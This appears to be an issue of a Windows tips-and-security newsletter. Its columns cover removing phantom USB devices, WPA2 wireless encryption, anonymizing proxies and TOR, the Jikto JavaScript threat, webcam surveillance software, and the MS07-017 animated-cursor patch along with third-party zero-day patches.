How to prevent and remove ‘phantom’ devices

How to prevent and remove 'phantom' devices

By Fred Langa A little ghostbusting is all it takes to free your system of nonexistent devices. Windows sometimes displays USB drives and other removable devices that are no longer connected to your system. Here’s how to cure the problem and prevent it from happening again.

Keep phantom devices at bay

Have you ever had Windows show you a device — perhaps a USB drive or other removable device — that’s no longer connected to your system? When this happens, you can run into trouble if software tries to access the phantom device.

Or, because the nonexistent device is still consuming a drive letter assignment and/or other resources, you may have problems when you add additional devices that need the already-assigned resources. I’ve seen some cases where people were running out of drive letters because their systems were maintaining a whole flock of phantom drives!

Let’s begin with ways to prevent the phantom devices from appearing in the first place. Then, we’ll come back to removing any that may already be there.

Phantom devices can appear for any number of reasons. Perhaps the most common reason is a shutdown error with a removable drive. Most people don’t know this, but there are actually three different ways to disconnect a removable drive. Two are correct, and one isn’t.

Here’s the official word from Microsoft on the two correct ways of removing an external or hot-swappable disk (or other device), as described in the Windows XP Professional Resource Kit:

• “If the Safely Remove Hardware icon appears in the taskbar notification area, you must use [it]. If the Safely Remove Hardware icon is not in the notification area, you must use Device Manager to uninstall the disk before you unplug it.”

The third, improper method is the one almost all of us use: We simply unplug the device. In fact, this usually works, as long as the device isn’t actively being written to or read from. You unplug the device, hear the audible "device unplugged" confirmation tones (a descending "ding-dong"), and that’s that.

But note Microsoft’s use of the word "must" in the above quote: You must use the Safely Remove Hardware method — if it’s available. It’s not a mere suggestion or recommendation. Microsoft says it’s a must.

That’s because simply unplugging a device (the way most of us do) runs the risk of losing data through a delayed write, or open file, or similar problem. You also risk leaving behind a phantom drive or other resource assignment, because the OS doesn’t realize the device is gone.

You can avoid these problems by using either the Safely Remove Hardware method or the Device Manager method. They ensure that all writes or other pending operations are completed, that any open files are closed, and that the OS knows it can free up whatever resource assignments the device was using.

To put it another way, go ahead and simply unplug your removable devices if you wish. Most times, it’ll work perfectly fine. But if it doesn’t and you end up with phantom drives or other problems, you’ll know why!

Of course, there are still are some pitfalls you need to watch out for — after all, this is Windows we’re talking about, and nothing is quite as simple as we might wish. Plus, there remains the question of what to do if your system is already carrying a flock of phantom drives. I’ll cover that in the items below.

Restoring the HotPlug Manager

OK, so know we know that we’re supposed to use the Safely Remove Hardware method to disconnect removable devices. But what happens if the Safely Remove Hardware icon goes AWOL on you? Or, what if you click it, but it doesn’t do anything? And what if you already have phantom drives on your system? How do you get rid of them?

The Safely Remove Hardware icon is actually a shortcut to Windows’ HotPlug Manager. This service normally launches automatically when you connect a recognized USB or Firewire device to your system.

Figure 1. The HotPlug Manager can be accessed via the Safely Remove Hardware icon, which normally appears in the Notification Area by the clock.

But, as with all software, things sometimes go awry. The HotPlug Manager occasionally hangs or fails to launch, meaning that the Safely Remove Hardware icon won’t appear, even when you know it should. In this case, the simple fix is to manually launch the HotPlug Manager by opening the Start, Run dialog and typing the following:

RunDll32.exe shell32.dll,Control_RunDLL HotPlug.dll

Click OK, and the HotPlug Manager’s Safely Remove Hardware icon should appear. Its dialog box should open and display any connected devices. That’s all it takes!

If only it were so simple. Unfortunately, not all devices cooperate with the HotPlug Manager. If you connect an unrecognized device to your system and the Safely Remove Hardware icon doesn’t appear — and manually launching the HotPlug Manager doesn’t help — it may be that the device simply won’t work with the HotPlug Manager. (It’s not very common, but it happens.)

To safely remove such an unrecognized device, you’ll have to use Device Manager to uninstall the device prior to disconnecting. (One way to access Device Manager is via Control Panel, Performance & Maintenance, System, Hardware, Device Manager.)

You may sometimes encounter a separate problem, too: The Safely Remove Hardware icon may be present, but won’t do anything when you click it. This problem doesn’t affect many systems, but if it affects yours, Microsoft has a hotfix for you — KB 883517.

The techniques above will help you properly shut down and remove devices from your system and should keep phantom devices from populating your system in the future. But, if you already have such phantoms in your PC, here’s the quick-and-dirty method I use when I have to clean up any kind of ghost device in my system, or when a known-good device’s settings become hopelessly bollixed:

Open Device Manager and uninstall not only the offending device itself, but also (if possible) any device that directly controls the offending device. On reboot, Windows will rediscover and reinstall the hardware, freshly reconfiguring the devices that are present and ridding the system of ghost devices.

For example, if I’m having a problem with disk drives, I may uninstall the drives and the drive controllers in Device Manager. On reboot, Windows will rediscover the controllers first, and then set up the drives afresh.

Or, if I’m having a USB problem, I’ll uninstall the USB Root Hubs and Controllers in Device Manager. On reboot, Windows will sort things out from scratch, leaving behind a freshly-configured, phantom-free setup.

This brute-force approach surely isn’t elegant, but it’s fast and it works. And, if you have current and complete backups, there’s essentially no risk to it.

Free virtual CD-ROM drive from Microsoft

I recently rediscovered a nifty free tool from Microsoft. You may find it useful, too.

It’s the Microsoft Virtual CD-ROM Control Panel. The download is a self-extracting archive that contains three files: the front end (VCdControlTool.exe), the virtual CD driver (VCdRom.sys), and a readme file. The latter contains the basic instructions for using the tool.

To understand how it works, you need to know about ISO files — a kind of disk image of a standard CD. Many large downloadable software packages (including most Linux distributions) are packaged as ISO files. These files contain not only the data that’s on the original CD, but also information about how the CD is structured and formatted.

Normally, an ISO file has to be processed by special software to separate the stored data from the formatting information. The software then uses the formatting data in the ISO file to burn an exact duplicate of the original CD’s contents. Most normal CD-burning tools have a built-in way to do this. In Roxio’s Creator Classic, for example, it’s under the Record Disc From Image option on the File menu.

But sometimes, you don’t want the entire contents of a CD. You may instead just want to extract one file from the ISO image. Or, perhaps you’d like to test-drive software before committing it to a physical CD. Or, you may be in a situation (such as with a laptop computer) where you only have one CD drive but would like to be able to access two or more CDs simultaneously. Or, maybe you’re bogged down by having to process large amounts of data from a relatively slow CD, and you’d much prefer to access the data at hard-drive speeds.

That’s where the Virtual CD-ROM Control Panel comes in. It lets you mount an ISO file of a CD in one step, without having to burn it to an actual, physical CD first. You then have access to the full contents of the CD and can get at any or all of the data.

The Virtual CD-ROM Control Panel also lets you mount several images at once, each with its own drive letter. I don’t know what the upper limit is, but I’ve had as many as four ISOs mounted at once, in addition to the two real CD drives in my system. And, of course, because the ISO files actually reside on your hard drive, you can access them at normal hard-drive speeds, which are usually much, much faster than CD drives.

There are other, similar tools out there, but this one’s free, and works well. Very, very handy!

Another free tool — TCP/IP optimizer

Reader Wendell Britnell pointed out a nice addition to the information already presented in “Optimizing Your Network Connections” in the Mar. 15 issue. He visited Speedguide.net and was very impressed by its TCP/IP Analyzer and TCP/IP Optimizer.

For years, SpeedGuide.net lagged behind BroadbandReports.com. It seemed to remain focused primarily on dialup, even when cable, DSL, and other fast connections were becoming commonplace. After a while, I let the site fall off my radar.

But Wendell is right: Their current tools are up to date and very nice. What’s more, they’re even more automated than BroadbandReport’s. If you’re looking to get the most out of your online connections, Speedguide is back in business!

Thanks, Wendell!

Fred Langa edited the LangaList e-mail newsletter from 1997 to 2006, when it merged with Windows Secrets. Prior to that, he was editor of Byte Magazine and editorial director of CMP Media, overseeing Windows Magazine and others.

Download gets a whole new meaning

If you think bathroom humor is limited to juveniles and mass media, think again. Just in time for April Fools’ Day comes Google’s announcement of TiSP — the Toilet Internet Service Provider. The gag service claims to offer free, ultra-high speed connectivity for your wireless-capable PC. The only catch is that you have to connect to their system via cables you run through your toilet and local sewers. The Google TiSP pages include a press release (touting the trademarked GFlush system), an installation guide ("wash your hands before surfing"), and a FAQ page (explaining how DNA analysis of your, er, "personal output" helps Google send you highly targeted advertising). More info.

Securing your wireless network with WPA2

By Mark Joseph Edwards Encryption isn’t any good if it can be easily cracked. You need to use the best encryption available, which currently means using WPA2. This week, I explain WPA2 and why you should take a layered approach to security.

WPA2 secures wireless better than WEP or WPA

In the Mar. 8 newsletter, I talked about securing wireless routers. One of the suggestions I made was to enable encryption, if your router and wireless network cards support that feature. Doing so helps prevent someone from snooping in your network traffic and using your bandwidth.

There are three basic types of encryption for most wireless networks: Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), and Wi-Fi Protected Access 2 (WPA2). When considering encryption, the basic thing you need to know is that encryption is accomplished using some type of cipher and some length of encryption key to scramble and unscramble the data.

WEP and WPA both use the RC4 stream cipher. WEP uses a 40-bit encryption key, while WPA uses a longer 128-bit key. Naturally, WPA provides stronger protection. WPA also uses dynamic keys, whereas WEP keys are static. Dynamic keys change at a interval, which adds to the strenth of WPA protection by making your keys a moving target.

WPA can also support 802.1X authentication. In very simplified terms, this is a logon mechanism that verifies who the user is. Without 802.1X in place, WPA isn´t as strong as it could be. In fact, some experts argue that without 802.1X, WPA isn´t much better than WEP.

For more information about weaknesses in WPA without 802.1X, see Joel Snyder and Rodney Thayer’s 2004 article in Network Computing entitled, “ WPA — An accident waiting to happen.”

Be aware that one popular tool for Mac OS X, called kismac, has the ability to discover encryption keys for both WEP and WPA. Other tools, such as WPA Cracker and CoWPatty, can do the same thing.

By contrast, WPA2 uses dynamic encryption keys and the Advanced Encryption Standard (AES) block cipher. This is far stronger than the RC4 cipher used in WEP and WPA. To date, no one has published a way to defeat WPA2 encryption, although that does not mean it isn’t possible. In fact, several people have theorized ways that WPA2 could be defeated — it simply hasn’t been demostrated yet.

So, if you require encryption between your computer and wireless router, and your network hardware and operating system supports WPA2, be sure to use it. If you can’t use WPA2, then use WPA; and if you can’t use WPA, then use WEP. Just be aware that both WPA and WEP can be cracked with relative ease. Doing so does require specialized software that the average person won’t bother locating and using. On the other hand, determined intruders will obtain such software and try to use it.

Keep in mind that network security essentially means controlling access. Therefore anything you do to control access is part of your security procedures.

Good network security requires a layered approach. The reason is simple and somewhat obvious: If one layer fails, then another layer can help protect your systems and network. For example, if someone found a way to crack your WPA2, then you would already have other layers in place that would help protect your network — if only for a little while longer.

There are some additional steps you can take to help protect your wireless network that will make it more difficult for a bad guy to break in. The extra time it takes to crack your system might be just enough for you to power off your network gear because you’re going to bed for the evening. A coincidence, yes, but you never know!

You can configure your router so that it doesn’t broadcast its Service Set Identifier (SSID), which is basically the router’s common name. While taking this step doesn’t completely eliminate a person’s ability to find your router’s name (that, too, can be done with special software), it will stop the average passerby from finding it.

Yet another step you can take is to configure the router so that it only accepts connections from specific Media Access Control (MAC) addresses, which are unique hardware numbers assigned to network interfaces. As with disabling SSID broadcasts, taking this step doesn’t completely prevent someone from connecting to your router. With enough knowledge and the right tools, someone could clone a MAC address that is allowed to connect to your router. But again, the average user who is merely looking for a quick way to check e-mail or view a Web page won’t bother with that. They’ll simply move on to find another nearby wireless network.

So, while both of these precautionary steps can be defeated by a savvy intruder, they will still go a long way towards keeping most, if not all, of your neighbors and strangers from connecting to your network without your permission.

And finally, one more step you can take to protect your wireless network is to simply turn it off when you aren’t using it! There’s no sense in leaving it on when it’s not in use, especially at night when you’re sleeping.

Thanks go out to John Landais for reminding me about the SSID features and MAC filtering.

Anonymizing your IP address for Web browsing

For various reasons, people sometimes want to anonymize their IP address so that Web sites can’t determine the real IP address of the person visiting the site. This can be accomplished in a variety of ways with a variety of tools.

What you need to know about anonymizing tools before choosing one is what types there are and how they work. With that information, you can easily find several different tools that meet your needs and then make an informed decision about which one to use.

There are two basic types of tools available: standalone proxy servers and Web-based anonymizing services. A Web-based anonymizing server is a Web application that you access like any other Web page. At the application’s host site, you enter into a form the URL of the site you want to access. When you click the submit button, the Web application retrieves the content and returns it to your Web browser.

Standalone proxy servers are very different from Web-based anonymizing servers. Standalone proxies typically don’t provide a Web-based form where you enter URLs. Instead, you configure your Web browser’s connection properties to point to the proxy server. Your browser then sends all of its traffic through the proxy, regardless of what Web site you’re visiting.

Most standalone proxy servers are run by relatively unknown third parties, such as businesses, universities, or private individuals. I strongly recommend that you stay completely away from unknown standalone proxy servers for two essential reasons. The first reason is that it might be entirely illegal to use the proxy server without the owner’s express permission. The second reason is that any proxy server operator can look in on your Internet use. If you don’t trust the proxy server operator, then you shouldn’t use the server when transmitting private information over the Internet.

If you must use some sort of proxy server, consider using a reasonably reputable Web-based anonymizing service. The only commercial Web-based service I know well is Anonymizer. Certainly there are other Web-based proxy services available, but Anonymizer is a legitimate business, and they maintain a good reputation, as far as I can tell.

I looked for a major publication that had published a review of anonymous proxy services and couldn’t find one. If you know of any, please send me an e-mail with the name of the publication and/or a link to the review. You can find my e-mail address at my Web site in the About section.

Thanks to Gene Goldenfeld for bringing up this topic via reader feedback.

Read the next item to learn about a slightly different type of proxy server network that you might consider using.

The Onion Router — a different type of proxy

In the Aug. 10 newsletter, Woody Leonhard wrote about The Onion Router (TOR). TOR is a network of proxy servers — think of them as layers — through which your network traffic passes before reaching its destination. Thus the use of the term “onion” to describe and name the tool.

Understanding how TOR works from a networking standpoint isn’t very difficult. Thousands of people around the world load the TOR software onto their computers and join the overall TOR network as relay servers or TOR endpoints. The TOR server software talks to centralized master TOR servers that keep track of all the IP addresses of all the TOR servers in the network.

After you load TOR software onto your computer and configure it to work as a TOR client, your computer will contact the master TOR servers to download a directory of both TOR relay servers and TOR endpoint servers. Your TOR client then uses that database to build a semi-random path through the TOR network, or a list of servers that your traffic will pass through before reaching its intended destination.

When you configure your Web browser’s proxy settings to use the TOR network, your traffic is first encrypted and then directed to the first TOR server in your path. This server in turn sends the traffic to the second TOR server in the path, which then sends the traffic to the third TOR server. This continues until the traffic reaches a TOR endpoint server, which then decrypts the traffic and sends it to its real destination.

The purpose of that sort of routing is to randomize the path that your data travels, and to obscure the source of the data traveling over the TOR network. The technique works pretty well, but it’s not flawless. I’ll discuss this in a moment.

You can learn how to install TOR on your Windows platform by visiting the TOR page at the Electronic Frontier Foundation (EFF). For a quick overview of the history of TOR, be sure to read Woody’s article. You can also read his story about the Java Anonymous Proxy project in that same issue.

There’s one thing you need to keep in mind about TOR: At the time Woody wrote his article, it was believed that there wasn’t any way for people to figure out your real IP address when you’re using the TOR network. That is no longer the case. It is entirely possible to find your real IP address, although the process of doing so isn’t very simple and it does require a bit of specialized knowledge.

The basic technique centers around the fact that even though your browser is configured to use a proxy server, some of the plug-ins or extensions that you might have added to your browser completely ignore those proxy settings and directly connect to sites on the Internet if they can. Therefore, someone could take advantage of that loophole to cause your system to reveal its IP address to the operator of a Web site that uses software designed to unmask proxy-service users.

The other thing to keep in mind about TOR is that since endpoint servers must decrypt your network traffic, the operator can easily see what you’re doing on your system.

The basic rule of thumb when it comes to any sort of anonymous Internet use is that your anonymity level is entirely relative — the more technical knowledge you have, the more anonymous you can become. The inverse is, of course, also true.

The dangers of Jikto running in your browser

JavaScript is a great feature found in every major Web browser available today. Essentially, JavaScript is a mini-programming language that lets Web developers create all sorts of nifty features for Web sites that wouldn’t be possible using only HTML.

For example, JavaScript can create navigating menus that work in a way similar to the menus you find in typical desktop applications. It can also be used to check the input of forms you might submit, preload content so that it loads more quickly later, make Web pages load content without having to reload an entire page, and the list goes on.

One of our readers, Davis Newman, brought to my attention a recent demonstration of JavaScript that can act in an insidious way. The script — called Jikto by Billy Hoffman, the security researcher who developed it — runs in the background while you’re visiting the Web site that hosts it, as described in an InfoWorld article. Using your bandwidth, the program scans other sites for vulnerabilities and sends any information it finds back to a centralized location. The technique started showing up on a few Web sites (the kind you don’t want to visit) earlier this week.

If you simply disable Javascript in your browser to defend against Jikto-like exploits, the chances are high that you’ll come across important sites that simply don’t work right because they depend on JavaScript.

Instead, if you use Firefox, you can install the popular NoScript extension. This free add-on lets you allow respected sites to run JavaScript in your browser, while disabling it for other sites you happen to visit.

If you use Internet Explorer, unfortunately, there doesn’t seem to be a similar tool that lets you control scripts. With IE, you can only control JavaScript globally — it’s either disabled or enabled, or it prompts you every time a Web page includes a script, which can be several instances per page. If you choose to disable scripts in IE, you need to add to your Trusted Sites zone any sites you wish to allow to run JavaScript.

To adjust the script settings in IE, follows these steps:

Step 1. Select the Tools menu, then Internet Options;

Step 2. Select the Security tab;

Step 3. Select the Internet Zone;

Step 4. Click Custom Level;

Step 5. Scroll down to Scripting and find the Active Scripting section;

Step 6. Select either Disable, Enable, or Prompt, then close the dialog.

Turn your Webcam into a surveillance system

Got a Webcam? Many people do. They can be fun and very useful in a variety of situations. A few years ago, I read a news story about a man whose home was broken into. The thieves stole a lot of stuff, and he had a sneaking suspicion that it was some locals from the neighborhood who might come back. So, he set up a Webcam in his house to catch them if they returned and, sure enough, they did! He used the video to help the police arrest and convict them.

Other uses for a Webcam might be to post images to your Web site, monitor your babysitter, or check in on your home while you’re away.

When you buy a Webcam, sometimes it includes decent software that lets you record nearly unlimited amounts of images or video. The limit is typically how much disk space you have. In other cases, the disk-space limits are built into the software to encourage you to buy an upgrade to the software from the camera vendor.

If you don’t have software capable of motion sensing and want to try that feature, I know of a few packages you might want to look at.

One is Willing WebCam, which costs US$49.95 from Willing Software. The company also has a Lite version for $29.95 that has fewer features. Another package is Cam Wizard from LEDSET. That one costs $29.95. Yet another package — which seems to be very well-liked, based on my research — is Easy Web Cam, from MS Agent Software. That one is free, which probably explains why it’s so popular.

How to extract data from troublesome ISO files

At some point, you may come across files with an .iso extension. An .iso file is an archive that stores the entire contents of a CD-ROM in a single file. You then use a CD-burner application to recreate the CD so you can use it on your PC. The .iso extension name is derived from the industry-standard, ISO 9660 file system used by CD-ROMs.

One of our readers, Scott Irvine, ran across a problem with an ISO image recently, which I’ve encountered several times in the past. Basically, what happens is that sometimes when you burn a CD from an ISO image, the CD might not work in your PC.

If that happens, and you really want to use the contents of that CD, there’s a way around the problem: you can extract all the files onto your hard drive. Doing that, of course, requires a tool that can read the ISO image.

There are several programs available to do that job. One is MagicISO, which costs $29.95. Another that I know about is Undisker, which costs about $40. Yet another tool, which is completely free (you gotta love that), is called 7-Zip. It’s a Windows file archive-handling application that can work with a variety of formats, including RAR, CAB, ISO, ARJ, LZH, CHM, Z, CPIO, RPM, DEB, NSIS, 7z, ZIP, GZIP, BZIP2, and TAR files.

If you already have 7-Zip, make sure your version is 4.2x or later if you need support for .iso files.

Mark Joseph Edwards is a senior contributing editor of Windows IT Pro Magazine and writes the weekly e-mail newsletter Security UPDATE. He’s a network engineer, freelance writer, and the author of Internet Security with Windows NT.

Don't rule out third-party security patches

By Ryan Russell A new zero-day threat for Windows recently appeared on the Web in the form of animated cursors and other graphical objects that could silently infect your system. This is yet another vulnerability that can compromise your PC if you simply view a Web page or read e-mail — and it even reportedly affects Firefox, as described by ZDNet blogger Ryan Naraine.

Microsoft’s patch didn’t come in time

According to the Microsoft Security Response Center blog, Microsoft was first notified about this vulnerability on Dec. 20, 2006, by a Determina security researcher. Microsoft also says it was made aware that the attack was being used in the wild on Mar. 28 by McAfee. The blog entry goes on to say that Determina is not to blame for leaking the flaw and speculates that it must have been discovered independently.

Microsoft released an emergency patch on Apr. 3, meaning that this exploit was being actively circulated for almost a week, if not longer.

I’m not going to blame Microsoft today for not predicting the future. What do you do when you’re aware that a zero-day attack is being used in the wild, but your vendor doesn’t have a patch. Do you sit back and take it, or do you craft your own mitigation strategy?

Microsoft doesn’t have a monopoly on patches

A third-party giving you a patch for someone else’s software is nothing new. After all, what was a floppy-disk copy-protection crack back in the ’80s but a special kind of binary patch? And, of course, small source patches are the norm in the open-source world.

But, in the recent past, there have been a handful of examples of binary patches to combat security holes in commercial software. I’m sure that if I looked hard, I could find examples of this from many years ago. The fact that people are doing it on a semi-regular basis now is what’s new.

The recent trend was kicked off by a patch that researcher Ilfak Guilfanov’s released in December 2005 for the WMF (Windows Metafile) vulnerability. As contributing editor Chris Mosby mentioned briefly in his Sept. 28 column, the Zero-day Emergency Response Team (ZERT) was later formed to create a patch for the Microsoft VML (Virtual Markup Language) vulnerability. ZERT released a patch for this issue. Determina also has released some zero-day patches.

It turns out that eEye Digital Security wants to get into the game, too. The company released its own patch for the animated cursor vulnerability, as announced in a Mar. 28 advisory.

Such third-party patches are now moot, because Microsoft has released its official patch. For more information, see contributing editor Susan Bradley’s column later in this issue.

However, another zero-day situation like this one is going to happen again at some point in the future, I promise you. It seems likely that a third-party patch will be once again available to you in the future, when no vendor patch is.

Should you use third-party patches?

This all raises the question of whether you should use third-party patches. I personally think you should consider it. No one is forcing these patches on you. Microsoft isn’t going to push them to you via Windows Update. Why would you ever want to remove a possible option from consideration?

Microsoft, of course, cannot recommend third-party patches to you. Is that a surprise? The company doesn’t need any more possible liability, and it doesn’t want you to do anything that might make its patch harder to install once it’s out.

But if you’re following everyone’s security advice, you already have firewall, antivirus, and antispyware tools installed that hook your system just as much as one of these tiny, third-party patches. So I think the idea that you’re creating some significant extra instability by installing an unofficial fix is probably a fallacy.

If you’re doing this on more than a handful of machines, however, you should have some process in place for qualifying new software and patches, whether they’re from Microsoft or anyone else. Also, you will want to remove third-party patches before installing any official Microsoft patch that may come out.

Some of these third-party patches cover platforms that Microsoft no longer supports. I can’t recommend that you stick with unsupported versions of Windows, but you may have your reasons. If you’re stuck with end-of-lifecycle software, these third-party patches start to look more attractive.

It all boils down to risk. Microsoft only took a week (from notification of an exploit being in the wild) to get its Apr. 3 patch out. But maybe your business can’t tolerate an entire week of unsafe Web surfing by your employees. Is a third-party patch a higher or lower risk than your workers inadvertently visiting malicious Web sites?

I want to be clear that I’m not endorsing any of the third-party patches. I haven’t tested them. Frankly, you really need to do some good reverse engineering and have your security people make a proper evaluation of what the impact of any third-party patch might be. We all fairly blindly trust Microsoft’s patches, because we know the world is watching and Microsoft can’t get away with too much funny business without quick detection. I personally extend nearly the same level of trust to ZERT, Determina, and eEye. If there’s anything the security industry likes to do, it’s rip apart one of its own when a mistake is made.

In any case, I like the fact that unofficial patches are available. Don’t let anyone take your options away.

The Perimeter Scan column gives you the facts you need to test your systems to prevent weaknesses. Ryan Russell is quality assurance manager at BigFix Inc., a configuration management company. He moderated the vuln-dev mailing list for three years under the alias “Blue Boar.” He was the lead author of Hack-Proofing Your Network, 2nd Ed., and the technical editor of the Stealing the Network book series.

Patch animated cursors, don't install 2003 SP2

By Susan Bradley The first Tuesday of two Patch Tuesdays that are happening this month suddenly hit us this week. It’s very important that you install Microsoft’s Apr. 3 patch to correct a serious security risk in Windows’ handling of icons and other images, but there are issues you need to know about.

MS07-017 (925902)
.Ani bug hits all Windows versions (yes, even Vista)

A threat is in the wild that affects everything from Windows 2000 all the way up to Windows Vista. In response, Microsoft released on Apr. 3 an out-of-cycle patch, MS07-017 (925902). This is an unusual patch that requires your immediate attention. (Microsoft’s usual, monthly batch of patches is expected to be released on Apr. 10, the second Tuesday of the month.)

Before you install the MS07-017 patch, be aware that Microsoft found an issue impacting Windows XP and 2003 machines. Knowledge Base article 935448 documents this issue, which prevents Realtek’s HD Audio Control Panel (see Figure 1, below) from running after the patch is installed. If this problem affects you, you’ll see the following error message after you apply the patch:

“Error on reboot: RTHDCPL.EXE IIlegal System Relocation. The System DLL user32.dll was relocated in memory. The application will not run properly. The relocation occurred because the DLL C:Windowssystem32HHCTRL.OCX occupied an address range reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL.”

Figure 1: Microsoft found an issue with patch MS07-017 that prevents Realtek’s HD Audio Control Panel (shown above) from running after the patch is installed.

Early reports in a CNET discussion forum indicate that some other software may be impacted as well. Microsoft says the problem results from two of its security updates conflicting. The company has released a hotfix, which appears to correct the problem with Realtek’s app and others. The hotfix is available via KB 935448.

Contributing editor Woody Leonhard was the first to point out to me that new audio drivers, dated Mar. 30, are now available from Realtek’s download page. He feels that installing the updated drivers is preferable to getting the hotfix.

As Robert David Graham points out in a Errata Security blog entry, the conflict gives us a clue as to why it took Microsoft from its first notification of the security hole in December 2006 until now to release the patch. Microsoft found issues such as these while testing, Graham says.

MS07-017 not only patches the “animated cursor” bug, which was first reported to Microsoft three-and-a-half months ago by Determina, but also six other graphics-based vulnerabilities.

If you’re a bit of a technical reader, you’re probably wondering why this patch, entitled “Vulnerabilities in GDI could allow remote code execution” sounds familiar? It’s because it’s very similar to MS05-002, MS05-053, and another out-of-cycle patch, MS06-001. All were graphics and cursor patches that were released in 2005 and early 2006 to close major security holes.

Earlier this week, there were reports that the Taiwan-based Web site of ASUS, the motherboard manufacturer, was unknowingly hosting an exploit using the then-unpatched .ani hole. SpywareSucks blogger Sandi Hardmeier wrote about this in an Apr. 4 blog entry.

This time, even using Firefox 2 or IE 7 on Vista might not have been enough to protect you, as ZDnet’s George Ou reports. Firefox doesn’t yet take advantage of Vista’s DEP (Data Execution Protection) mechanism, and by default DEP is not turned on in Vista for IE 7 or most other applications. Microsoft blogger Robert Hensing provides information about the additional security layer you can add to IE under Vista if your Intel or AMD CPU supports hardware DEP.

Bottom line, the graphics bugs are nasty on 2000 and XP, and only in Vista are you moderately protected. Thus, if you’re like many and are not using Vista, be aware of the quirks I describe above, but still apply patch MS07-017 immediately.

Windows 2003 SP2 is still causing issues

As I reported in my Mar. 22 column, I’m still seeing issues with the installation of Window 2003 Service Pack 2. As a result, I’m waiting before installing SP2 on my production systems, and I recommend that you hold off, too.

Most of the issues are being reported on Small Business Server 2003 and ISA Server 2004, Microsoft’s firewall product. The hardest issues to resolve are related to certain chipsets of network cards, typically the Broadcom chipset. Here’s an overview of this and some other problems:

• VPN, network and connectivity issues. You may find issues with your ISA 2004 firewall, Outlook connectivity, Remote Desktop, or VPN (Virtual Private Network). If you have Broadcom NICs (network interface cards), first make sure you have the latest drivers installed. Then, use the Registry to disable RSS (Receive Side Scaling) and Task Offloading, as discussed in the SBS blog and the ISA Server blog.

• Help and Support Service missing. Seemingly the largest issue, and one that’s easily fixed, is that the Help and Support Service appears to be missing. The instructions to reinstall this service are discussed on the SBS blog for that platform.

• Issues caused by uninstallation of SP2. Issues caused by removing SP2 include scheduled tasks being altered so you must reenter your passwords. Also, unless you have Windows 2003 R2 or SBS 2003 R2, removing SP2 causes the rollback of MMC 2.0 to have issues. To resolve this, review the known issues in the release notes and remove the files from the %APPDATA%MicrosoftMMC folder.

The Patch Watch column reveals problems with patches for Windows and major Windows applications. Susan Bradley recently received a MVP (Most Valuable Professional) award from Microsoft for her knowledge in the areas of Small Business Server and network security. She’s also a partner in a California CPA firm.